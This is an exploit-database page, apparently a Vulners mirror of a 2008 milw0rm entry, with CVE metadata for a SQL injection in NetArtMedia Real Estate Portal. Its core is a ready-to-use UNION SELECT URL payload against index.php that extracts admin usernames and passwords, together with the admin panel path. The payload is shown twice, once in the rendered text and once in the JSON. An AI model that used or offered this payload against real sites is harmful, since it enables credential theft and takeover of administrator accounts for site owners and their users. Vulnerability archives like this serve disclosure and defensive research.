Search...

NetArtMedia Real Estate Portal 1.2 - SQL Injection Vulnerability

2008-09-21T00:00:00

ID EDB-ID:6518
Type exploitdb
Reporter Encrypt3d.M!nd
Modified 2008-09-21T00:00:00

Description

NetArtMedia Real Estate Portal 1.2 SQL Injection Vulnerability. CVE-2008-6042. Webapps exploit for php platform

                                        
                                            ######## ##    ##  ######  ########  ##    ## ########  ########  #######  ########
##       ###   ## ##    ## ##     ##  ##  ##  ##     ##    ##    ##     ## ##     ##
##       ####  ## ##       ##     ##   ####   ##     ##    ##           ## ##     ##
######   ## ## ## ##       ########     ##    ########     ##     #######  ##     ##
##       ##  #### ##       ##   ##      ##    ##           ##           ## ##     ##
##       ##   ### ##    ## ##    ##     ##    ##           ##    ##     ## ##     ##
######## ##    ##  ######  ##     ##    ##    ##           ##     #######  ########
################################ !R4Q!4N H4CK3R  ###################################
NetArtMedia Real Estate Portal v2.0  Sql Injection Vulnerability
Website    : http://www.netartmedia.net
Founded By : Encrypt3d.M!nd
Home Page  : http://encrypt3d.blogspot.com

# Remote Sql Injection(s) :
Affected File :
index.php

PoC:
/index.php?mod=re_search&ad=-666 union select 1,2,password,username,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from websiteadmin_admin_users

Administration Panel:
/ADMIN/login.php

# Greetz:
MY Sweet,L!0N,EL Mariachi,-=MizO=-,Shadow Administrator,
KoRn The Dog,MiNi-SpIder,All My Friends

The EnD :D

# milw0rm.com [2008-09-21]

JSON Vulners Source

Initial Source

{"hash": "8a3a779711c1ac7f4e3e6618983c0715721a8b885b4c02b9874b3bc0065891eb", "id": "EDB-ID:6518", "lastseen": "2016-02-01T00:02:16", "viewCount": 15, "bulletinFamily": "exploit", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "edition": 1, "history": [], "enchantments": {"vulnersScore": 7.5}, "type": "exploitdb", "sourceHref": "https://www.exploit-db.com/download/6518/", "description": "NetArtMedia Real Estate Portal 1.2 SQL Injection Vulnerability. CVE-2008-6042. Webapps exploit for php platform", "title": "NetArtMedia Real Estate Portal 1.2 - SQL Injection Vulnerability", "sourceData": "######## ## ## ###### ######## ## ## ######## ######## ####### ########\n## ### ## ## ## ## ## ## ## ## ## ## ## ## ## ##\n## #### ## ## ## ## #### ## ## ## ## ## ##\n###### ## ## ## ## ######## ## ######## ## ####### ## ##\n## ## #### ## ## ## ## ## ## ## ## ##\n## ## ### ## ## ## ## ## ## ## ## ## ## ##\n######## ## ## ###### ## ## ## ## ## ####### ########\n################################ !R4Q!4N H4CK3R ###################################\nNetArtMedia Real Estate Portal v2.0 Sql Injection Vulnerability\nWebsite : http://www.netartmedia.net\nFounded By : Encrypt3d.M!nd\nHome Page : http://encrypt3d.blogspot.com\n\n# Remote Sql Injection(s) :\nAffected File :\nindex.php\n\nPoC:\n/index.php?mod=re_search&ad=-666 union select 1,2,password,username,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from websiteadmin_admin_users\n\nAdministration Panel:\n/ADMIN/login.php\n\n# Greetz:\nMY Sweet,L!0N,EL Mariachi,-=MizO=-,Shadow Administrator,\nKoRn The Dog,MiNi-SpIder,All My Friends\n\nThe EnD :D\n\n# milw0rm.com [2008-09-21]\n", "objectVersion": "1.0", "cvelist": ["CVE-2008-6042"], "published": "2008-09-21T00:00:00", "osvdbidlist": ["48412"], "references": [], "reporter": "Encrypt3d.M!nd ", "modified": "2008-09-21T00:00:00", "href": "https://www.exploit-db.com/exploits/6518/"}

{"result": {"cve": [{"id": "CVE-2008-6042", "type": "cve", "title": "CVE-2008-6042", "description": "SQL injection vulnerability in the re_search module in NetArtMedia Real Estate Portal 2.0 allows remote attackers to execute arbitrary SQL commands via the ad parameter to index.php.", "published": "2009-02-03T06:30:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-6042", "cvelist": ["CVE-2008-6042"], "lastseen": "2017-09-29T14:26:17"}]}}